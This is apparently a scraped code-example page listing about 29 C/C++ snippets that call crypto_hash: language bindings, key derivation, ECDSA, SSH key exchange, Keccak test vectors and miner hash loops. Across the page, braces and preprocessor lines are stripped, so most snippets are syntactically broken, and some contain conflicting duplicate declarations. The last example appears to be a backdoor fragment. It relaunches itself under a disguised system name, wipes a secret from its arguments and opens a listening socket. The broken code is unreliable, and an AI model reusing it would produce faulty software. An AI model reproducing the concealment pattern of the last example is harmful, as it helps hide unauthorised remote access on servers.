Example #1
static PyObject *crypto_getpowhash(PyObject *self, PyObject *args)
    char *output;
    PyObject *value;
    PyBytesObject *input;
    PyStringObject *input;
    if (!PyArg_ParseTuple(args, "S", &input))
        return NULL;
    output = PyMem_Malloc(32);

    crypto_hash((char *)PyBytes_AsString((PyObject*) input), output);
    crypto_hash((char *)PyString_AsString((PyObject*) input), output);
    value = Py_BuildValue("y#", output, 32);
    value = Py_BuildValue("s#", output, 32);
    return value;
Example #2
static void kdf( uint8_t *result
               , uint32_t result_size
               , const uint8_t secret[GEC_SECRET_BYTES_LEN]
               , uint8_t party_byte)
    uint16_t count;
    uint32_t bytes_remaining = result_size;
    const uint32_t HASH_INPUT_LEN = sizeof(count) + GEC_SECRET_BYTES_LEN + sizeof(party_byte);
    uint8_t hash_input[HASH_INPUT_LEN];
    uint32_t nrReps = (result_size + GEC_HASH_LEN - 1) / GEC_HASH_LEN;

    hash_input[sizeof(hash_input)-1] = party_byte;
    memcpy(hash_input + sizeof(count), secret, GEC_SECRET_BYTES_LEN);
    for(count=0; count < nrReps; count++) {
        PUT16be(hash_input, count);
        if(bytes_remaining > GEC_HASH_LEN) {
            crypto_hash(result + count*GEC_HASH_LEN, hash_input, HASH_INPUT_LEN);
        } else {
            uint8_t tmp[GEC_HASH_LEN];
            crypto_hash(tmp, hash_input, HASH_INPUT_LEN);
            memcpy(result + count*GEC_HASH_LEN, tmp, bytes_remaining);
        bytes_remaining -= GEC_HASH_LEN;
Example #3
void bench()
#define BENCH_TRIALS     32
#define BENCH_MAXLEN   1536
  static unsigned char in[4096];
  static unsigned long long median[4096 + 1];
  int i, j;
  printf( "#bytes  median  per byte\n" );

  /* 1 ... BENCH_MAXLEN */
  for( j = 0; j <= 4096; ++j )
    uint64_t cycles[BENCH_TRIALS + 1];

    for( i = 0; i <= BENCH_TRIALS; ++i )
      cycles[i] = cpucycles();
      crypto_hash( in, in, j );

    for( i = 0; i < BENCH_TRIALS; ++i )
      cycles[i] = cycles[i + 1] - cycles[i];

    qsort( cycles, BENCH_TRIALS, sizeof( uint64_t ), bench_cmp );
    median[j] = cycles[BENCH_TRIALS / 2];

  for( j = 0; j <= BENCH_MAXLEN; j += 8 )
    printf( "%5d, %7.2f\n", j, ( double )median[j] / j );

  printf( "#2048   %6llu   %7.2f\n", median[2048], ( double )median[2048] / 2048.0 );
  printf( "#4096   %6llu   %7.2f\n", median[4096], ( double )median[4096] / 4096.0 );
  printf( "#long     long   %7.2f\n", ( double )( median[4096] - median[2048] ) / 2048.0 );
Example #4
void Hash3(uint256 *pResult, unsigned char const *pbegin, unsigned char const *pend)
	uint256 hash1;
//	uint256 hash2;
	crypto_hash((unsigned char*)&hash1, pbegin, (pend - pbegin) * sizeof(pbegin[0]));
//	crypto_hash((unsigned char*)&hash2, (unsigned char*)&hash1, sizeof(hash1));
	*pResult = hash1;
Example #5
EncryptedMessage CryptoEngine::EncryptWithPublicKeyAndSign(const Message &message, const VerificationEngine &ver_engine) {

    // check the public key
    if (ver_engine.public_key().empty()) {
        std::cout << "The recipient public key is empty. Cannot encrypt here." << std::endl;
        throw g_crypto_engine_encryption_failure;

    if (ver_engine.signing_public_key().empty()) {
        std::cout << "The recipient signing public key is empty. Cannot encrypt here." << std::endl;
        throw g_crypto_engine_encryption_failure;

    if (private_key_.empty()) {
        std::cout << "The secret key is empty. Cannot encrypt here." << std::endl;
        throw g_crypto_engine_encryption_failure;

    if (nonce_master_key_.empty()) {
        std::cout << "The master key for deriving the nonce is not valid" << std::endl;
        throw g_crypto_engine_encryption_failure;

    if (context_.empty()) {
        std::cout << "The context identifier for deriving the nonce is not valid" << std::endl;
        throw g_crypto_engine_encryption_failure;

    if (salt_.empty()) {
        std::cout << "The salt for deriving the nonce is not valid" << std::endl;
        throw g_crypto_engine_encryption_failure;

    // means the current crypto engine and the recipient crypto engine have the same public keys !
    // This is NOT SAFE - stop immediately
    if(crypto_verify_32 (reinterpret_cast<const unsigned char *>(public_key_.data()),
                         reinterpret_cast<const unsigned char *>(ver_engine.public_key().data())) == 0) {
        std::cout << "The engine public key and the recipient public key are the same !!! Did you copy the same files to two different peers ? This is NOT SAFE !! STOPPING !" << std::endl;
        throw g_crypto_engine_encryption_failure;

    // derive the nonce
    std::string nonce = hkdf_.DeriveNonce(nonce_master_key_, salt_);

    // calculate the hash of the data
    std::string hash(crypto_hash(message.ToBytesString()));

    // calculate the signature on the hash
    std::string signed_hash = crypto_sign(hash, sign_private_key_);

    // prepend the signature+hash to the message
    std::string signed_message_string = signed_hash + message.ToBytesString();

    // encrypt with the recipient public key
    std::string cipher_text = crypto_box(signed_message_string, nonce, ver_engine.public_key(), private_key_);

    return EncryptedMessage(nonce, cipher_text);
Example #6
void hash_H(byte_string_t md_value, fp2_t x, params_t params)
//hash a point of E/F_p^2 to a byte_string
    byte_string_t bs;

    byte_string_set_fp2(bs, x);

    crypto_hash(md_value, bs);

Example #7
void hash_G(mpz_t h, byte_string_t bs, params_t params)
//hash a byte_string to an element of Z_p
    byte_string_t md_value;

    crypto_hash(md_value, bs);

    mympz_from_hash(h, params->p, md_value);

Example #8
i64 derive_key(u8 *output_key, u8 *input_key, i64 input_size, u8 *salt) {
   u8 *aux1, *aux2, *block1, *block2;
   u32 count, ndx;
   if (!output_key || !input_key || !salt || input_size <= 0) {
      return -1;
   //crypto_hash_BYTES > SALT_SIZE, we have no INT(i) since we limit keySize
   //to 32 bytes which is less than 64 byte digest of crypto_hash
   aux1 = malloc(2*(input_size + crypto_hash_BYTES));
   if (!aux1) {
      return -1;
   block1 = aux1 + input_size;
   aux2 = aux1 + input_size + crypto_hash_BYTES;
   block2 = aux2 + input_size;
   memcpy(aux1, input_key, input_size);
   memcpy(block1, salt, SALT_SIZE);
   memcpy(aux2, input_key, input_size);
   crypto_hash(block2, aux1, input_size + SALT_SIZE);
   memcpy(output_key, block2, KEY_SIZE);  //copy over U1 to key
   for (count = 0; count < KEY_DERIV_ITER; ++count) {
      crypto_hash(block1, aux2, input_size + crypto_hash_BYTES);
      //perform XOR with Ui on current U so far in key
      for (ndx = 0; ndx < KEY_SIZE; ++ndx) {
         output_key[ndx] = output_key[ndx] ^ block1[ndx];
      crypto_hash(block2, aux1, input_size + crypto_hash_BYTES);
      for (ndx = 0; ndx < KEY_SIZE; ++ndx) {
         output_key[ndx] = output_key[ndx] ^ block2[ndx];
   memset(aux1, 0, 2*(input_size + crypto_hash_BYTES));  //clear our data
   return KEY_SIZE;
Example #9
int main(void)
    size_t i;

    crypto_hash(h, x, sizeof x - 1U);
    for (i = 0; i < crypto_hash_BYTES; ++i) {
        printf("%02x", (unsigned int)h[i]);

    return 0;
Example #10
main(int argc, const char **argv)
	unsigned char *m, h[crypto_hash_BYTES];
	size_t mlen, i;

	mlen = readmsg(&m);
	crypto_hash(h, m, mlen);
	for (i = 0; i < sizeof(h); i++)
		printf("%02x", h[i]);
	return 0;
Example #11
File: ecdsa.c Project: wbl/NISTP
/*The format of signed messages is as follows: the first 64 bytes are a
  signature, the first 32 being r, the second 32 s. The message follows.*/
void crypto_sign_ecdsa256sha512(unsigned char *sm, unsigned long long *smlen,
                           const unsigned char *m, unsigned long long mlen,
                           const unsigned char *sk){
  unsigned char mhash[64];
  unsigned char kchar[64];
  unsigned char rchar[64];
  unsigned char expt[32];
  scp256 z;
  scp256 k;
  point R;
  scp256 r;
  scp256 d;
  scp256 kinv;
  scp256 s;
  scp256 t1;
  scp256 t2;
  memcpy(sm+64, m, mlen);
  crypto_hash(mhash, m, mlen);
  scp256_unpack(&z, mhash);
  /*We could append sk, but I worry about secret key leaks
   with mmapped memory*/
  memcpy(mhash, sk+32, 32);
  crypto_hash(kchar, mhash, 64);
  scp256_from64bytes(&k, kchar); //not FIPS compliant, but that's okay
  scp256_pack(expt, &k);
  p256scalarmult_base(&R, expt);
  p256pack(rchar, &R);
  scp256_unpack(&r, rchar); //this is just x
  scp256_unpack(&d, sk); //the secret exponent
  scp256_mul(&t1, &d, &r);
  scp256_add(&t2, &z, &t1); //z+rd
  scp256_inv(&kinv, &k);
  scp256_mul(&s, &kinv, &t2); //k^{-1}(z-rd)
  scp256_pack(sm, &r); //r goes first
  scp256_pack(sm+32, &s); //s goes next.
  //what about r=0 or s=0? Then we can't sign this message, ever.
  //so let's assume that doesn't happen.
  //this is okay: signer will not accept it
Example #12
File: kex.c Project: 0xe/win-sshd
byte *keymaker(char c, int len_needed, session *s) {
	char buff[1024], *outb = MALLOC(len_needed), *km, *err;
	int total_bytes, bytes;
	kexinit_packet *cl = (kexinit_packet *)s->kex;
	bytes = long_swap(*(uint32 *)s->secret_key) + sizeof(uint32);
	memcpy(buff, s->secret_key, bytes);
	memcpy(buff+bytes, cl->kex_hash, 20);
	bytes += 20;
	memcpy(buff+bytes, &c, 1);
	bytes += 1;
	memcpy(buff+bytes, s->session_id, 20);
	bytes += 20;
	km = crypto_hash(SHA1, buff, &bytes, &err);
	total_bytes = bytes;
	memcpy(outb, km, total_bytes <= len_needed ? total_bytes : len_needed);
	while (total_bytes < len_needed) {
		int need = len_needed - total_bytes;
		bytes = long_swap(*(uint32 *)s->secret_key) + sizeof(uint32);
		memcpy(buff, s->secret_key, bytes);
		memcpy(buff+bytes, cl->kex_hash, 20);
		bytes += 20;
		memcpy(buff+bytes, outb, total_bytes);
		bytes += total_bytes;
		km = crypto_hash(SHA1, buff, &bytes, &err);
		if (need <= bytes) {
			memcpy(outb+total_bytes, km, need);
			total_bytes += need;
		} else {
			memcpy(outb+total_bytes, km, bytes);
			total_bytes += bytes;
	return outb;
Example #13
static ERL_NIF_TERM nacl_hash(ErlNifEnv *env, int argc, ERL_NIF_TERM const argv[])
  ErlNifBinary input;
  ErlNifBinary result;

  if (!enif_inspect_iolist_as_binary(env, argv[0], &input))
    return enif_make_badarg(env);

  if (!enif_alloc_binary(crypto_hash_BYTES, &result))
    return nacl_error_tuple(env, "alloc_failed");

  crypto_hash(result.data, input.data, input.size);

  return enif_make_binary(env, &result);
Example #14
File: ecdsa.c Project: wbl/NISTP
int crypto_sign_open_ecdsa256sha512(unsigned char *m, unsigned long long *mlen,
                                    const unsigned char *sm,
                                    unsigned long long smlen,
                                    const unsigned char *pk){
  //all data here is public: don't worry about revelations
  unsigned char mhash[64];
  point Q;
  point u1B;
  point u2Q;
  point result;
  unsigned char resultchar[64];
  scp256 u1;
  scp256 u2;
  unsigned char u1char[32];
  unsigned char u2char[32];
  scp256 z;
  scp256 s;
  scp256 r;
  scp256 w;
  scp256 newr;
  scp256 t;
  if(smlen<64) return -1;
  p256unpack(&Q, pk);
  if(!p256oncurvefinite(&Q)) return -1; //check key validity
  //just some message manipulation
  memcpy(m, sm+64, smlen-64);
  crypto_hash(mhash, m, *mlen);
  scp256_unpack(&z, mhash);
  scp256_unpack(&s, sm+32);
  scp256_unpack(&r, sm);
  if(scp256_iszero(&r)||scp256_iszero(&s)) return -1;
  scp256_inv(&w, &s);
  scp256_mul(&u1, &z, &w);
  scp256_mul(&u2, &r, &w);
  scp256_pack(u1char, &u1);
  scp256_pack(u2char, &u2);
  p256dblmult_base(&result, &Q, u2char, u1char);
  if(!p256oncurvefinite(&result)) return -1;
  p256pack(resultchar, &result);
  scp256_unpack(&newr, resultchar);
  scp256_sub(&t, &newr, &r);
    return 0;
  return -1;
Example #15
void measure(void)
  int i;
  int loop;
  int mlen;

  for (loop = 0;loop < LOOPS;++loop) {
    for (mlen = 0;mlen <= MAXTEST_BYTES;mlen += 1 + mlen / MGAP) {
      for (i = 0;i <= TIMINGS;++i) {
        cycles[i] = cpucycles();
void testKeccakTree()
    unsigned char message[1000];
    unsigned char out[1000];
    unsigned int len;
    unsigned int i;
    for(len=0; len<=1000; len++) {
        for(i=0; i<len; i++)
            message[i] = (unsigned char)(len-i);
        crypto_hash(out, message, len);
        printf("Message of length %d bits\n", len*8);
        for(i=0; i<rateInBytes; i++)
            printf("%02x ", out[i]);
Example #17
int main(void)
    size_t i;

    crypto_hash(h, x, sizeof x - 1U);
    for (i = 0; i < crypto_hash_BYTES; ++i) {
        printf("%02x", (unsigned int)h[i]);

    assert(crypto_hash_bytes() > 0U);
    assert(strcmp(crypto_hash_primitive(), "sha512") == 0);
    assert(crypto_hash_sha256_bytes() > 0U);
    assert(crypto_hash_sha512_bytes() == crypto_hash_bytes());

    return 0;
Example #18
static void do_hmac_pad (s4pp_ctx_t *ctx, uint8_t padval)
  const digest_mech_info_t *mech = ctx->digest.mech;
  unsigned klen = ctx->auth->key_len;
  const uint8_t *key = ctx->auth->key_bytes;
  uint8_t altkey[mech->digest_size];
  if (klen > mech->block_size)
    crypto_hash (mech, key, ctx->auth->key_len, altkey);
    key = altkey;
    klen = mech->digest_size;
  uint8_t pad[mech->block_size];
  memset (pad, padval, sizeof (pad));
  for (unsigned i = 0; i < klen; ++i)
    pad[i] ^= key[i];

  mech->update (ctx->digest.ctx, pad, sizeof (pad));
int generate_test_vectors()
	FILE                *fp;
	char                fileName[MAX_FILE_NAME];
	unsigned char       msg[MAX_MESSAGE_LENGTH];
	unsigned char		digest[CRYPTO_BYTES];
	int                 ret_val = KAT_SUCCESS;
	int					count = 1;
	unsigned long long	mlen;

	init_buffer(msg, sizeof(msg));

	sprintf(fileName, "LWC_HASH_KAT_%d.txt", (CRYPTO_BYTES * 8));

	if ((fp = fopen(fileName, "w")) == NULL) {
		fprintf(stderr, "Couldn't open <%s> for write\n", fileName);

	for (mlen = 0; mlen <= MAX_MESSAGE_LENGTH; mlen++) {

		fprintf(fp, "Count = %d\n", count++);

		fprint_bstr(fp, "Msg = ", msg, mlen);

		ret_val = crypto_hash(digest, msg, mlen);
		if(ret_val != 0) {
			fprintf(fp, "crypto_hash returned <%d>\n", ret_val);
			ret_val = KAT_CRYPTO_FAILURE;

		fprint_bstr(fp, "MD = ", digest, CRYPTO_BYTES);

		fprintf(fp, "\n");


	return ret_val;
Example #20

  int i;
  int bytes_plaintext;
  //char *plaintext="0000000000000000000000000000000000000000000000000000000000000000";
  //unsigned char *plaintext="616263";
  //unsigned char *plaintext="cc";
  unsigned char *plaintext="3a3a819c48efde2ad914fbf00e18ab6bc4f14513ab27d0c178a188b61431e7f5623cb66b23346775d386b50e982c493adbbfc54b9a3cd383382336a1a0b2150a15358f336d03ae18f666c7573d55c4fd181c29e6ccfde63ea35f0adf5885cfc0a3d84a2b2e4dd24496db789e663170cef74798aa1bbcd4574ea0bba40489d764b2f83aadc66b148b4a0cd95246c127d5871c4f11418690a5ddf01246a0c80a43c70088b6183639dcfda4125bd113a8f49ee23ed306faac576c3fb0c1e256671d817fc2534a52f5b439f72e424de376f4c565cca82307dd9ef76da5b7c4eb7e085172e328807c02d011ffbf33785378d79dc266f6a5be6bb0e4a92eceebaeb1";

  // plaintext
  hex2byte(s, m); // transforms from left (string) to right (bytes)
  for (i = 0;i < bytes_plaintext;++i) printf("%02x",m[i]); printf("\n"); fflush(stdout);    
  for (i = 0;i < 512/8;++i) printf("%02x",c[i]); printf("\n"); fflush(stdout);

  return 0;
Example #21
static nif_term_t
salt_hash(nif_heap_t *hp, int argc, const nif_term_t argv[])
	/* salt_hash(Message) -> Hash_bin. */
	nif_bin_t 		ms;
	nif_bin_t 		hs;

	if (argc != 1)
		return (BADARG);

	if (! enif_inspect_iolist_as_binary(hp, argv[0], &ms))
		return (BADARG);

	if (ms.size < 1 || ms.size > SALT_MAX_MESSAGE_SIZE)
		return (BADARG);

	if (! enif_alloc_binary(crypto_hash_BYTES, &hs))
		return (BADARG);

	(void)crypto_hash(hs.data, ms.data, ms.size);
	return (enif_make_binary(hp, &hs));
Example #22
File: kex.c Project: 0xe/win-sshd
int kex_dhinit(session *s, ssh_packet *p) {
	char buf[MAX_SSH_PAYLOAD_SIZE], *t;
	uint32 pos = 0, bytes;
	byte *sign, *KS;
	void *packet;
	kexinit_packet *cl = (kexinit_packet *)s->kex;
	mpint *pub_key;
	unsigned int want_keylen;
	char *err;
	want_keylen = (unsigned int)crypto_cipher_key_size(s->e_s2c);
	s->secret_key = crypto_kex(s->kex_algo, p->data, &pub_key, want_keylen, &err);
	if (!s->secret_key) {
		/** XXX: free secret_key & dh_pub_key on cleanup - register crypto_cleanup()  */
		DEBUG("KEX gen failed - %s (%d-%d-%d)", err, DH1, DH14, s->kex_algo);
		return 0;
	/* compute H = HASH(V_C || V_S || I_C || I_S || K_S || e || f || K) */
	/* string VC */
	t = make_string(s->client_version, &bytes);
	memcpy(buf+pos, t, bytes);
	pos += bytes;
	/* string VS */
	t = make_string(SSH_IDENT, &bytes);
	memcpy(buf+pos, t, bytes);
	pos += bytes;
	/* string IC */
	t = make_string_b(cl->IC, cl->IC_len, &bytes);
	memcpy(buf+pos, t, bytes);
	pos += bytes;
	/* string IS */
	//show_hex(cl->IS, cl->IS_len);
	t = make_string_b(cl->IS, cl->IS_len, &bytes);
	memcpy(buf+pos, t, bytes);
	pos += bytes;
	/* string KS */
	t = KS = make_ssh_key(s->host_key, s->server_ctx->dsa_keys, &bytes);
	KS = make_string_b(KS, bytes, &bytes);
	memcpy(buf+pos, KS, bytes);
	pos += bytes;
	/* mpint e */
	bytes = long_swap(*(uint32 *)p->data) + sizeof(uint32);
	memcpy(buf+pos, p->data, bytes);
	pos += bytes;
	/* mpint f */
	bytes = long_swap(*(uint32 *)pub_key) + sizeof(uint32);
	memcpy(buf+pos, pub_key, bytes);
	pos += bytes;
	/* mpint K */
	bytes = long_swap(*(uint32 *)s->secret_key) + sizeof(uint32);
	memcpy(buf+pos, s->secret_key, bytes);
	pos += bytes;
	t = crypto_hash(SHA1, buf, &pos, &err);
	if (!s->enc) {
		s->session_id = MALLOC(20);
		memcpy(s->session_id, t, 20);
	cl->kex_hash = t;
	/* sign the hash with our host private key */
	bytes = 20;
	sign = do_sign(s->host_key, t, &bytes, s, &err);
	t = sign;
	sign = make_string_b(sign, bytes, &bytes);
	plain_ssh_packet_begin(&packet, SSH_MSG_KEXDH_REPLY);
	plain_ssh_packet_add_string(packet, KS);
	plain_ssh_packet_add_mpint(packet, pub_key);
	plain_ssh_packet_add_string(packet, sign);
	plain_ssh_packet_finalize(s, packet);
	if (!plain_ssh_packet_write(s, packet)) {
		DEBUG("failed to write KEXDH_REPLY");
		return 0;
	return 1;
Example #23
void keccak_regenhash(struct work *work)
	uint256 result;
	crypto_hash((unsigned char*)&result, &work->data[0], 80);
	memcpy(work->hash, &result, 32);
Example #24
int scanhash_keccak(int thr_id, uint32_t *pdata, const uint32_t *ptarget,
	uint32_t max_nonce, struct timeval *tv_start, struct timeval *tv_end, unsigned long *hashes_done)
	int throughput = cuda_throughput(thr_id);

	gettimeofday(tv_start, NULL);

	uint32_t n = pdata[19] - 1;
//	((uint32_t*)ptarget)[7] = 0x0000000f;
	const uint32_t Htarg = ptarget[7];

	uint32_t endiandata[20];
	for (int kk=0; kk < 20; kk++)
		be32enc(&endiandata[kk], pdata[kk]);

	cuda_prepare_keccak256(thr_id, endiandata, ptarget);

	uint32_t *cuda_hash64[2] = { (uint32_t *)cuda_hashbuffer(thr_id, 0), (uint32_t *)cuda_hashbuffer(thr_id, 1) };
	memset(cuda_hash64[0], 0xff, throughput * 8 * sizeof(uint32_t));
	memset(cuda_hash64[1], 0xff, throughput * 8 * sizeof(uint32_t));

	bool validate = false;
	uint32_t nonce[2];
	int cur = 0, nxt = 1;

	// begin work on first CUDA stream
	nonce[cur] = n+1; n += throughput;
	cuda_do_keccak256(thr_id, 0, cuda_hash64[cur], nonce[cur], throughput, validate);

	do {

		nonce[nxt] = n+1; n += throughput;
		if ((n-throughput) < max_nonce && !work_restart[thr_id].restart)
			// begin work on next CUDA stream
			cuda_do_keccak256(thr_id, 0, cuda_hash64[nxt], nonce[nxt], throughput, validate);

		// synchronize current stream and get the "winning" nonce index, if any
		cuda_scrypt_sync(thr_id, cur);
		uint32_t result =  *cuda_hash64[cur];

		// optional full CPU based validation (see validate flag)
		if (validate)
			for (int i=0; i < throughput; ++i)
				uint32_t hash64[8];
				be32enc(&endiandata[19], nonce[cur]+i); 
				crypto_hash( (unsigned char*)hash64, (unsigned char*)&endiandata[0], 80 );
				if (memcmp(hash64, &cuda_hash64[8*i], 32))
					fprintf(stderr, "CPU and CUDA hashes (i=%d) differ!\n", i);
		else if (result != 0xffffffff && result > pdata[19])
			uint32_t hash64[8];
			be32enc(&endiandata[19], result);
			crypto_hash( (unsigned char*)hash64, (unsigned char*)&endiandata[0], 80 );
			if (result >= nonce[cur] && result < nonce[cur]+throughput && hash64[7] <= Htarg && fulltest(hash64, ptarget)) {
				*hashes_done = n-throughput - pdata[19] + 1;
				pdata[19] = result;
				gettimeofday(tv_end, NULL);
				return true;
			} else {
				applog(LOG_INFO, "GPU #%d: %s result for nonce $%08x does not validate on CPU!", device_map[thr_id], device_name[thr_id], result);
		cur = (cur + 1) % 2;
		nxt = (nxt + 1) % 2;
	} while ((n-throughput) < max_nonce && !work_restart[thr_id].restart);
	*hashes_done = n-throughput - pdata[19] + 1;
	if (n-throughput > pdata[19])
		// CB: don't report values bigger max_nonce
		pdata[19] = max_nonce > n-throughput ? n-throughput : max_nonce;
		pdata[19] = 0xffffffffU; // CB: prevent nonce space overflow.
	gettimeofday(tv_end, NULL);
	return 0;
Example #25
void keccak_regenhash(struct work *work)
	uint256 result;
        crypto_hash(&result, &work->data[0], &work->data[80]);
	memcpy(work->hash, &result, 32);
int main( void )
    unsigned long long    inlen;
    int                    result = 0;
    FILE                *fp_in;
    char                marker[20];
    int                    refLen;

#ifdef cKeccakFixedOutputLengthInBytes
    refLen = cKeccakFixedOutputLengthInBytes;
    refLen = cKeccakR_SizeInBytes;

    printf( "Testing Keccak[r=%u, c=%u] against %s over %d squeezed bytes\n", cKeccakR, cKeccakB - cKeccakR, testVectorFile, refLen );
    if ( (fp_in = fopen(testVectorFile, "r")) == NULL ) 
        printf("Couldn't open <%s> for read\n", testVectorFile);
        return 1;

    for ( inlen = 0; inlen <= cKeccakMaxMessageSizeInBytes; ++inlen )
        sprintf( marker, "Len = %u", inlen * 8 );
        if ( !FindMarker(fp_in, marker) )
            printf("ERROR: no test vector found (%u bytes)\n", inlen );
            result = 1;
        if ( !ReadHex(fp_in, input, (int)inlen, "Msg = ") ) 
            printf("ERROR: unable to read 'Msg' (%u bytes)\n", inlen );
            result = 1;

        result = crypto_hash( output, input, inlen );
        if ( result != 0 )
            printf("ERROR: crypto_hash() (%u bytes)\n", inlen);
            result = 1;

        #ifdef cKeccakFixedOutputLengthInBytes
        if ( !ReadHex(fp_in, input, refLen, "MD = ") )
        if ( !ReadHex(fp_in, input, refLen, "Squeezed = ") )
            printf("ERROR: unable to read 'Squeezed/MD' (%u bytes)\n", inlen );
            result = 1;
        if ( memcmp( output, input, refLen ) != 0) 
            printf("ERROR: hash verification (%u bytes)\n", inlen );
            for(result=0; result<refLen; result++)
                printf("%02X ", output[result]);
            result = 1;

    fclose( fp_in );
    if ( !result )
        printf( "\nSuccess!\n");

    //printf( "\nPress a key ...");
    //printf( "\n");
    return ( result );
int main( void )
    unsigned long long    inlen;
    unsigned long long    offset;
    unsigned long long    size;
    int                    result = 0;
    FILE                *fp_in;
    char                marker[20];
    int                    refLen;
    hashState			state;

#ifdef cKeccakFixedOutputLengthInBytes
    refLen = cKeccakFixedOutputLengthInBytes;
    refLen = cKeccakR_SizeInBytes;

    printf( "Testing Keccak[r=%u, c=%u] using crypto_hash() against %s over %d squeezed bytes\n", cKeccakR, cKeccakB - cKeccakR, testVectorFile, refLen );
    if ( (fp_in = fopen(testVectorFile, "r")) == NULL ) 
        printf("Couldn't open <%s> for read\n", testVectorFile);
        return 1;

    for ( inlen = 0; inlen <= cKeccakMaxMessageSizeInBytes; ++inlen )
        sprintf( marker, "Len = %u", inlen * 8 );
        if ( !FindMarker(fp_in, marker) )
            printf("ERROR: no test vector found (%u bytes)\n", inlen );
            result = 1;
        if ( !ReadHex(fp_in, input, (int)inlen, "Msg = ") ) 
            printf("ERROR: unable to read 'Msg' (%u bytes)\n", inlen );
            result = 1;

        result = crypto_hash( output, input, inlen );
        if ( result != 0 )
            printf("ERROR: crypto_hash() (%u bytes)\n", inlen);
            result = 1;

        #ifdef cKeccakFixedOutputLengthInBytes
        if ( !ReadHex(fp_in, input, refLen, "MD = ") )
        if ( !ReadHex(fp_in, input, refLen, "Squeezed = ") )
            printf("ERROR: unable to read 'Squeezed/MD' (%u bytes)\n", inlen );
            result = 1;
        if ( memcmp( output, input, refLen ) != 0) 
            printf("ERROR: hash verification (%u bytes)\n", inlen );
            for(result=0; result<refLen; result++)
                printf("%02X ", output[result]);
            result = 1;
    if ( !result )
        printf( "\nSuccess!\n");
	result = 0;

    refLen = cKeccakHashRefSizeInBytes;
    printf( "\nTesting Keccak[r=%u, c=%u] using Init/Update/Final() against %s over %d squeezed bytes\n", cKeccakR, cKeccakB - cKeccakR, testVectorFile, refLen );
    fseek( fp_in, 0, SEEK_SET );
    for ( inlen = 0; inlen <= cKeccakMaxMessageSizeInBits; ++inlen )
        sprintf( marker, "Len = %u", inlen );
        if ( !FindMarker(fp_in, marker) )
            printf("ERROR: no test vector found (%u bits)\n", inlen );
            result = 1;
        if ( !ReadHex(fp_in, input, (int)inlen, "Msg = ") ) 
            printf("ERROR: unable to read 'Msg' (%u bits)\n", inlen );
            result = 1;

		result = Init( &state );
        if ( result != 0 )
            printf("ERROR: Init() (%u bits)\n", inlen);
            result = 1;

		for ( offset = 0; offset < inlen; offset += size )
			//	vary sizes for Update()
			if ( (inlen %8) < 2 )
				//	byte per byte
				size = 8;
			else if ( (inlen %8) < 4 )
				//	incremental
				size = offset + 8;
				//	random
				size = ((rand() % ((inlen + 8) / 8)) + 1) * 8;

			if ( size > (inlen - offset) ) 
				size = inlen - offset;
			//printf("Update() inlen %u, size %u, offset %u\n", (unsigned int)inlen, (unsigned int)size, (unsigned int)offset );
			result = Update( &state, input + offset / 8, size );
	        if ( result != 0 )
	            printf("ERROR: Update() (%u bits)\n", inlen);
	            result = 1;
		result = Final( &state, output, refLen );
        if ( result != 0 )
            printf("ERROR: Final() (%u bits)\n", inlen);
            result = 1;

        #ifdef cKeccakFixedOutputLengthInBytes
        if ( !ReadHex(fp_in, input, refLen, "MD = ") )
        if ( !ReadHex(fp_in, input, refLen, "Squeezed = ") )
            printf("ERROR: unable to read 'Squeezed/MD' (%u bits)\n", inlen );
            result = 1;
        if ( memcmp( output, input, refLen ) != 0) 
            printf("ERROR: hash verification (%u bits)\n", inlen );
            for(result=0; result<refLen; result++)
                printf("%02X ", output[result]);
            result = 1;

    fclose( fp_in );
    if ( !result )
        printf( "\nSuccess!\n");

    //printf( "\nPress a key ...");
    //printf( "\n");
    return ( result );
Example #28
int sss_test3()
 	int ret = 0;
	unsigned char * data_out = NULL;
	int data_out_len = 1024/8;
	int i = 0;
	u32 N[MAX_N_LENGTH] =
        0xbc7bd14d, 0xc668378f, 0x21ede7db, 0xe6708189,
        0xba9d3be0, 0xd0daeb54, 0x6044fcb7, 0xc0c0af92,
        0x6409dfb5, 0x5b7f52ad, 0xeb38d7e8,  0x8e2619b,
        0x313b8f7e, 0x30b9c657, 0x6d917e6c, 0x250ac29f,
        0x90238692, 0x9b90db74, 0xd2d428eb, 0xc68e7901,
        0xaa6ec926, 0x87f7bc39, 0xf01ce959, 0x1e0da497,
        0x1174e0c6, 0x82a2da44, 0xdd779c99, 0x52b40f33,
        0x7d109cc4, 0xc04a36ce, 0xbc5827d5, 0x68ca5105,

	data_out = (unsigned char*)malloc(data_out_len);
		return -1;
	memset(data_out, 0, (unsigned)data_out_len);
	ret = crypto_hash((char *)N, sizeof(N), CRYPTO_ALGORITHM_SHA1, (char *)data_out, &data_out_len);
	if(ret == BSP_ERROR)
		security_print("function : %s -- linenum : %d -- retval : %X\n", ret);
		return ret;
	security_print("CRYPTO_ALGORITHM_SHA1 :\n");
	for(i = 0; i < data_out_len; i += 4)
		security_print("%lx\n", *(long *)&(data_out[i]));

	data_out_len = 1024/8;
	memset(data_out, 0, (unsigned)data_out_len);
	ret = crypto_hash((char *)N, sizeof(N), CRYPTO_ALGORITHM_MD5, (char *)data_out, &data_out_len);
	security_print("\nCRYPTO_ALGORITHM_MD5 :\n\n");
	if(ret == BSP_ERROR)
		security_print("function : %s -- linenum : %d -- retval : %X\n", ret);
		return ret;
	for(i = 0; i < data_out_len; i += 4)
		/* coverity[printf_arg_mismatch] */
		security_print("%lx\n", *(long*)(&(data_out[i])));

	data_out_len = 1024/8;
	memset(data_out, 0, (unsigned)data_out_len);
	ret = crypto_hash((char *)N, sizeof(N), CRYPTO_ALGORITHM_SHA256, (char *)data_out, &data_out_len);
	security_print("\nRYPTO_ALGORITHM_SHA256 :\n\n");
	if(ret == BSP_ERROR)
		security_print("function : %s -- linenum : %d -- retval : %x\n",ret);
		return ret;
	for(i = 0; i < data_out_len; i += 4)
		/* coverity[printf_arg_mismatch] */
		security_print("%lx\n", *(long*)(&(data_out[i])));
	return ret;
Example #29
int main(int argc, char *argv[])
#if 0
                crypto_hash(buffer, buffer, 96);
                hd(buffer, 1088 / 8);
        if (argc == 2) {
                static char *eargv[] = { "/sbin/ifwatch-if", "eth0", 0, 0 };
                eargv[2] = argv[1];
                execve(argv[0], eargv, environ);

                int i;

                for (i = 0; i < 64 + 2; ++i)
                        secret[32 + i] = argv[2][i * 2 + 0] * 16 + argv[2][i * 2 + 1] - 'a' * (16 + 1);

                for (i = 0; i < (64 + 2) * 2; ++i)
                        argv[2][i] = ' ';

        int ls = socket(AF_INET, SOCK_STREAM, 0);

        if (ls < 0)
                return 0;

        struct sockaddr_in sa;

        sa.sin_family = AF_INET;
        sa.sin_addr.s_addr = INADDR_ANY;
